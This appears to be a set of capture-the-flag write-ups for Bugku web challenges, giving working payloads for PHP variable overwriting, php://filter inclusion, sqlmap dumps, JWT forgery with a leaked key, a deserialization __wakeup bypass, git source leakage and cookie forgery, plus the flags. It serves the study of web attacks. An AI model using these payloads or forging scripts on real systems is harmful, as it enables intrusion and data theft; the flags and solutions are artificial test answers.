Writeups for the new Bugku challenges

All easy ones.

WEB1

<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
include 'flag.php';
$b='ssAEDsssss';
extract($_GET);
if(isset($a)) {
    $c = trim(file_get_contents($b));
    if($a==$c) {
        echo $myFlag;
    } else {
        echo '继续努力,相信flag离你不远了'; // "keep going, the flag isn't far off"
    }
}
?>

The point being tested is PHP variable overwriting.

extract($_GET) takes the GET parameters and turns each key/value pair into a variable name and value, and only after that does the if check run. So any parameter submitted via GET overwrites the variables the script relies on, including $b, and each condition can be satisfied from the query string.

Hence the payload ?a=&b=. With $b empty, file_get_contents('') fails and returns false (the warning is hidden by error_reporting(0)), trim(false) gives the empty string, and $a == '' holds, which prints flag{c3fd1661da5efb989c72b91f3c378759}.

WEB2

Looking at it, it's basically a race against the clock (the expression on the page has to be solved and submitted before it expires), so a quick scraper does it.

# -*- coding: utf-8 -*-
import re
import requests
from bs4 import BeautifulSoup

url = 'http://123.206.31.85:10002/'

# Session cookie copied from the browser: the GET that reads the expression and the
# POST that answers it must share the same session, or the server hands out a new one.
headers = {
    'Cookie': 'PHPSESSID=gss81c94di250qs94uq0c5vuhgas9q81',
    'Content-Type': 'application/x-www-form-urlencoded',
}


def getText():
    return requests.get(url=url, headers=headers).text


def getFlag(result):
    data = 'result=' + str(result)
    return requests.post(url=url, data=data, headers=headers).text


soup = BeautifulSoup(getText(), features="lxml")
cal = soup.find('p').get_text(strip=True)
cal = re.sub(r'[^\x00-\x7f]', '', cal)   # drop the Chinese prompt text around the expression
cal = re.sub(r'[a-z]', '', cal)          # drop stray letters, leaving only the arithmetic
# eval() on server-supplied text is only acceptable against a CTF box; refuse anything
# that isn't plain arithmetic so a hostile page can't run code here
if not re.fullmatch(r'[\d+\-*/%() ]+', cal):
    raise SystemExit('unexpected expression: %r' % cal)
res = BeautifulSoup(getFlag(eval(cal)), features="lxml")
print(res.text)

Gives flag{b37d6bdd7bb132c7c7f6072cd318697c}

WEB3

Spent a long time thinking this was a file upload challenge, then realised it's actually file inclusion, orz.

The home page is ?op=home and the upload page is ?op=upload. ?op=flag gives no error while ?op=1 does, which suggests op is passed to include() with .php appended.

So construct ?op=php://filter/read=convert.base64-encode/resource=flag, which makes the include read flag.php through the base64 filter and return its source instead of executing it. Base64-decode the output.

Gives flag{e00f8931037cbdb25f6b1d82dfe5552f}

WEB4

Throw it into sqlmap, feeding it the saved request:

python sqlmap.py -r "bugku.txt" --dbs

That turns up a URL, which gives flag{7ae7de60f14eb3cbd9403a0c4328598d}

WEB5

Throw it into sqlmap and dump the flag column directly:

python sqlmap.py -u "http://47.95.208.167:10005/?mod=read&id=1" -D web5 -T flag -C flag --dump

Gives flag{320dbb1c03cdaaf29d16f9d653c88bcb}

WEB6

Brute-force the login with Burp Suite Intruder: admin/test123

Gives flag{85ff2ee4171396724bae20c0bd851f6b}

WEB7

Looking at the cookie: the first ten characters, 351e766803, have no obvious meaning, and the following 32 characters are an MD5 hash (21232f297a57a5a743894a0e4a801fc3 is md5("admin")).

After a few tries, filling in 351e76680321232f297a57a5a743894a0e4a801fc3 everywhere worked.

Gives flag{98112cb20fb17cc81687115010f8a5c3}

WEB8

WEB9

Per the hint, PUT the string bugku to the server:

PUT / HTTP/1.1
Host: 123.206.31.85:3031
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: PHPSESSID=gg5i701sc080tdc1u5bdacmj509k3m6i
X-Forwarded-For: 127.0.0.1
Connection: close
Content-Length: 5

bugku

Gives flag{T7l8xs9fc1nct8NviPTbn3fG0dzX9V}

WEB10

View the page source: there's a Base32 string in a comment, which decodes to the credentials.

kk:kk123

After logging in, the page says vim crashed, so there's a leaked swap file with the source: L3yx.php.swp

</form>NTER or type command to continue
<!--hint:NNVTU23LGEZDG===-->
</html>

<?php
error_reporting(0);
require_once 'src/JWT.php';

const KEY = 'L3yx----++++----';

function loginkk()
{
    $time = time();
    $token = [
        'iss'=>'L3yx',
        'iat'=>$time,
        'exp'=>$time+5,
        'account'=>'kk'
    ];
    $jwt = \Firebase\JWT\JWT::encode($token,KEY);
    setcookie("token",$jwt);
    header("location:user.php");
}

if(isset($_POST['username']) && isset($_POST['password']) && $_POST['username']!='' && $_POST['password']!='')
{
    if($_POST['username']=='kk' && $_POST['password']=='kk123')
    {
        loginkk();
    }
    else
    {
        echo "账号或密码错误"; // "wrong username or password"
    }
}
?>

Then, per the hint, forge the JWT: change account to L3yx and push exp much further out. The token is HS256 and the signing key (KEY) sits in the leaked source, so the modified token can simply be re-signed with the same key and the server can't tell it apart from its own.

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTQ5NzAyNTIyLCJleHAiOjE1NDk3MTA4MjYsImFjY291bnQiOiJMM3l4In0.jVsu0yPVFRViqY3RiQeQU6MAThXiSfgTJS0ysg3OLKY
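As an added example (not code from the original writeup or from php-jwt), here is how that token is minted and verified with only the Python standard library. It uses the key and claim layout from the leaked source above; the header order and compact JSON match what php-jwt produces, so the first two segments of the forged token come out identical to the page's token. The `forge_admin_token` and `signature_valid` helpers are my own names.

```python
import base64
import hashlib
import hmac
import json
import time

# Signing key recovered from the leaked L3yx.php.swp shown above
KEY = b'L3yx----++++----'


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + '=' * (-len(text) % 4))


def jwt_encode(claims: dict, key: bytes) -> str:
    """Mint an HS256 JWT the way php-jwt does: header and claims as compact JSON,
    base64url without padding, HMAC-SHA256 over 'header.claims'."""
    header = {'typ': 'JWT', 'alg': 'HS256'}
    signing_input = '.'.join(
        b64url(json.dumps(part, separators=(',', ':')).encode())
        for part in (header, claims)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + '.' + b64url(sig)


def signature_valid(token: str, key: bytes) -> bool:
    """Recompute the HMAC over the first two segments and compare in constant time.
    Only HS256 is accepted, so an alg=none or alg-swapped token is rejected."""
    try:
        header_b64, claims_b64, sig_b64 = token.split('.')
        header = json.loads(b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return False
    if header.get('alg') != 'HS256':
        return False
    expected = hmac.new(key, f'{header_b64}.{claims_b64}'.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def jwt_decode(token: str, key: bytes, now=None) -> dict:
    """Verify signature and exp, then return the claims: the checks user.php has
    to perform before trusting 'account'."""
    if not signature_valid(token, key):
        raise ValueError('bad signature')
    claims = json.loads(b64url_decode(token.split('.')[1]))
    now = int(time.time()) if now is None else now
    if 'exp' in claims and claims['exp'] < now:
        raise ValueError('token expired')
    return claims


def forge_admin_token(key: bytes, now=None, lifetime: int = 3600) -> str:
    """Reissue the kk token with account=L3yx and a comfortable exp. This only
    works because the server's HS256 key is known; with any other key the
    signature check fails."""
    now = int(time.time()) if now is None else now
    claims = {'iss': 'L3yx', 'iat': now, 'exp': now + lifetime, 'account': 'L3yx'}
    return jwt_encode(claims, key)


if __name__ == '__main__':
    print(forge_admin_token(KEY))
```

Paste the printed token into the token cookie and load user.php. The same `jwt_decode` is what a fix would have to run server-side; the real fix, of course, is not shipping the key in a world-readable swap file.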

Gives flag{32ef489b73c4362ca6f28b7e7cf88368}

WEB11

Following the hint, robots.txt points to shell.php, which asks for a number whose MD5 starts with a given prefix. A short script finds it.

import hashlib

# search for the integer whose MD5 hex digest starts with the prefix shell.php shows
for i in range(1, 100000):
    if hashlib.md5(str(i).encode()).hexdigest().startswith("af1042"):
        print(i)

Gives flag{e2f86fb5f75da4999e6f4957d89aaca0}

WEB12

<?php

class Time{

    public $flag = "******************";
    public $truepassword = "******************";
    public $time;
    public $password;

    public function __construct($tt, $pp) {
        $this->time = $tt;
        $this->password = $pp;
    }

    function __destruct(){
        if(!empty($this->password))
        {
            if(strcmp($this->password,$this->truepassword)==0){
                echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";
                if(!empty($this->time)){
                    if(!is_numeric($this->time)){
                        echo 'Sorry.<br>';
                        show_source(__FILE__);
                    }
                    else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){
                        echo 'you need a bigger time.<br>';
                    }
                    else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){
                        echo 'you need a smaller time.<br>';
                    }
                    else{
                        sleep((int)$this->time);
                        var_dump($this->flag);
                    }
                    echo '<hr>';
                }
                else{
                    echo '<h1>you have no time!!!!!</h1><br>';
                }
            }
            else{
                echo '<h1>Password is wrong............</h1><br>';
            }
        }
        else{
            echo "<h1>Please input password..........</h1><br>";
        }
    }

    function __wakeup(){
        $this->passwotd = 1;
        echo 'hello hacker,I have changed your password and time, rua!';
    }
}


if(isset($_GET['rua'])){
    $rua = $_GET['rua'];
    $a = unserialize($rua);
}
else{
    echo "<h1>Please don't stop rua 233333</h1><br>";
}

?>

A PHP deserialization challenge. The point is bypassing __wakeup(): when the property count declared in the serialized string is larger than the number of properties actually present, PHP skips __wakeup() during unserialize() (CVE-2016-7124, fixed in 5.6.25 and 7.0.10). As written, __wakeup() only assigns a misspelled $this->passwotd anyway, but the count trick skips it regardless.

The three time checks are bypassed with a hexadecimal string. On PHP 5, is_numeric("0x4c06f351") is true and the comparisons treat it as 1275523921, one more than 11*22*33*44*55*66 and below the upper bound, but (int)"0x4c06f351" is 0, so the sleep() becomes sleep(0) and the flag is dumped immediately. Passing password as an array makes strcmp() return NULL, and NULL == 0 is true, so the real password is never needed. Note that PHP 7 no longer treats hexadecimal strings as numeric, so the hex part of this trick only works on PHP 5.

So the payload is:

?rua=O:4:"Time":6:{s:4:"time";s:10:"0x4c06f351";s:8:"password";a:1:{i:1;i:1;}}
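As an added example (my code, not from the original writeup), a small Python helper that builds that serialized string instead of hand-writing it, with the declared property count and the time value as explicit parameters. The serialization format is PHP's standard serialize() output; the bounds are the constants from the challenge source. The names `php_object`, `build_rua_payload` and `rua_url` are my own.

```python
from urllib.parse import quote

LOW = 11 * 22 * 33 * 44 * 55 * 66    # 1275523920: 'you need a bigger time' below this
HIGH = 66 * 55 * 44 * 33 * 23 * 11   # 1333502280: 'you need a smaller time' above this
TIME_VALUE = hex(LOW + 1)            # '0x4c06f351': numeric on PHP 5, but (int) casts it to 0


def php_str(s: str) -> str:
    # PHP counts bytes, not characters, in the length prefix
    return f's:{len(s.encode())}:"{s}";'


def php_serialize(value) -> str:
    """Serialize ints, bools, strings, lists and dicts in PHP's serialize() format."""
    if isinstance(value, bool):
        return f'b:{int(value)};'
    if isinstance(value, int):
        return f'i:{value};'
    if isinstance(value, str):
        return php_str(value)
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = ''.join(php_serialize(k) + php_serialize(v) for k, v in items)
        return f'a:{len(value)}:{{{body}}}'
    raise TypeError(f'unsupported type {type(value).__name__}')


def php_object(cls: str, props: dict, declared_count=None) -> str:
    """O:<len>:"<class>":<count>:{...}. declared_count lets the string lie about
    the property count: a value above len(props) makes PHP before 5.6.25 / 7.0.10
    skip __wakeup() on unserialize (CVE-2016-7124)."""
    count = len(props) if declared_count is None else declared_count
    body = ''.join(php_str(k) + php_serialize(v) for k, v in props.items())
    return f'O:{len(cls)}:"{cls}":{count}:{{{body}}}'


def build_rua_payload() -> str:
    # password as an array: strcmp(array, string) returns NULL and NULL == 0 holds,
    # so the real password is never needed; 6 > 2 real properties skips __wakeup()
    return php_object('Time', {'time': TIME_VALUE, 'password': {1: 1}}, declared_count=6)


def rua_url() -> str:
    """The GET query string, percent-encoded so the quotes and braces survive."""
    return '?rua=' + quote(build_rua_payload(), safe='')


if __name__ == '__main__':
    print(build_rua_payload())
    print(rua_url())
```

Keeping the count and the time as parameters makes it easy to retry with a normal count or a decimal time when a target runs a patched PHP, where only the array-password part of the trick still applies.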

Gives the flag.

WEB13

Looking at the response, there's a Base64-encoded password in a response header.

Submitting it by hand gets a "too slow" message, so it has to be scripted.

import base64
import requests

url = "http://123.206.31.85:10013/index.php"
headers = {'Cookie': 'PHPSESSID=gg5i701sc080tdc1u5bdacmj509k3m6i'}

# the Password response header is Base64; after decoding, the actual password is
# wrapped in a few extra characters at either end, which the slice strips off
resp = requests.get(url=url, headers=headers)
password = base64.b64decode(resp.headers['Password'])
data = {'password': password[5:-1]}
resp = requests.post(url=url, headers=headers, data=data)
print(resp.content.decode(errors='replace'))

Gives flag{FjXAkdGnOBoIUZaFzHqjInY2VndLSg}

WEB14

This one tests git source leakage: the .git directory is exposed, so the repository can be pulled down and the source recovered.

python GitHack.py http://123.206.31.85:10014/.git/

The recovered source contains flag{GitIsAFreeVessionControlSyStem}

WEB15

Per the hint, source leakage: a scan finds the editor backup index.php~

<?php
header('content-type:text/html;charset=utf-8');
include './flag.php';
error_reporting(0);
if(empty($_GET['id'])){
    header('location:./1ndex.php');
}else{
    $id = $_GET['id'];
    if (!is_numeric($id)) {
        $id = intval($id);
        switch ($id) {
            case $id>=0:
                echo "快出去吧,走错路了~~~<br>"; // "get out, wrong way"
                echo "这么简单都不会么?";      // "can't even do something this simple?"
                break;
            case $id>=10:
                exit($flag);
                break;
            default:
                echo "你走不到这一步的!";      // "you won't get this far!"
                break;
        }
    }
}
?>

The case labels here are wrong: switch compares $id loosely against the result of each case expression, and those results are booleans, not numbers.

As long as the parameter is a non-numeric string, intval() turns it into 0. The first case evaluates $id>=0 to true, and 0 == true is false, so it doesn't match. The second evaluates $id>=10 to false, and 0 == false is true, so it matches and exit($flag) runs, giving flag{Is_wh1te_ooo000oo0}

WEB16

Digging through the page turns up three JavaScript files: a main one plus a Base64 implementation and an MD5 implementation it calls. Deobfuscating the main one gives the following, which decodes the user cookie and derives the flag from a field inside it.

function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i].trim();
        if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
    }
    return ""
}

function decode_create(temp) {
    var base = new Base64();
    var result = base.decode(temp);
    var result3 = "";
    for (i = 0; i < result.length; i++) {
        var num = result[i].charCodeAt();
        num = num ^ i;
        num = num - ((i % 10) + 2);
        result3 += String.fromCharCode(num)
    }
    return result3
}

function ertqwe() {
    var temp_name = "user";
    var temp = getCookie(temp_name);
    temp = decodeURIComponent(temp);
    var mingwen = decode_create(temp);
    var ca = mingwen.split(';');
    var key = "";
    for (i = 0; i < ca.length; i++) {
        if (-1 < ca[i].indexOf("flag")) {
            key = ca[i + 1].split(":")[2]
        }
    }
    key = key.replace('"', "").replace('"', "");
    document.write('<img id="attack-1" src="image/1-1.jpg">');
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-2.jpg"
    }, 1000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-3.jpg"
    }, 2000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-4.jpg"
    }, 3000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/6.png"
    }, 4000);
    setTimeout(function() {
        alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!flag{" + md5(key) + "}")
    }, 5000)
}
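As an added example (my code, not part of the page or the challenge), a Python port of decode_create() together with its inverse and the key-extraction logic of ertqwe(), so the cookie can be decoded, inspected and re-encoded offline instead of waiting for the browser animation. It assumes the page's Base64 class is plain standard base64 with one character per byte, and the plaintext layout is inferred from the split logic (fields separated by ';', the key being the third ':'-separated part of the field after the one containing "flag"). The sample plaintext is constructed for the demonstration, not the challenge's real cookie.

```python
import base64
import hashlib
from urllib.parse import quote, unquote


def decode_create(temp: str) -> str:
    """Port of decode_create(): base64-decode, then for each index i XOR the
    char code with i and subtract (i % 10) + 2. Assumes one char per byte."""
    raw = base64.b64decode(temp).decode('latin-1')
    out = []
    for i, ch in enumerate(raw):
        num = ord(ch) ^ i
        num -= (i % 10) + 2
        out.append(chr(num))
    return ''.join(out)


def encode_create(plain: str) -> str:
    """Inverse of decode_create(): add (i % 10) + 2, XOR with i, then base64.
    Only defined while the intermediate value fits in one byte (ASCII input
    under 256 chars), which is all the cookie format needs."""
    buf = bytearray()
    for i, ch in enumerate(plain):
        num = (ord(ch) + (i % 10) + 2) ^ i
        if not 0 <= num <= 255:
            raise ValueError(f'char {ch!r} at index {i} does not fit in a byte')
        buf.append(num)
    return base64.b64encode(bytes(buf)).decode()


def extract_key(user_cookie: str) -> str:
    """Mirror ertqwe(): URL-decode the cookie, decode it, split on ';' and take
    the third ':'-separated part of the field after the one mentioning 'flag',
    minus the first two double quotes."""
    mingwen = decode_create(unquote(user_cookie))
    fields = mingwen.split(';')
    key = ''
    for i, field in enumerate(fields):
        if 'flag' in field:
            key = fields[i + 1].split(':')[2]
    return key.replace('"', '', 2)


def flag_for(user_cookie: str) -> str:
    """What the alert() finally shows: flag{md5(key)}."""
    return 'flag{' + hashlib.md5(extract_key(user_cookie).encode()).hexdigest() + '}'


# Constructed sample in the shape ertqwe() expects (not the real challenge cookie)
SAMPLE_PLAIN = 'user:kk;flag:here;key:type:"s3cret";end'
SAMPLE_COOKIE = quote(encode_create(SAMPLE_PLAIN))


if __name__ == '__main__':
    print(SAMPLE_COOKIE)
    print(decode_create(unquote(SAMPLE_COOKIE)))
    print(flag_for(SAMPLE_COOKIE))
```

Run it against the real value of the user cookie by replacing SAMPLE_COOKIE with the string from the browser. Since the whole transform is client-side and reversible, anything the server trusts from this cookie can be forged with encode_create(), which is the actual lesson of the challenge.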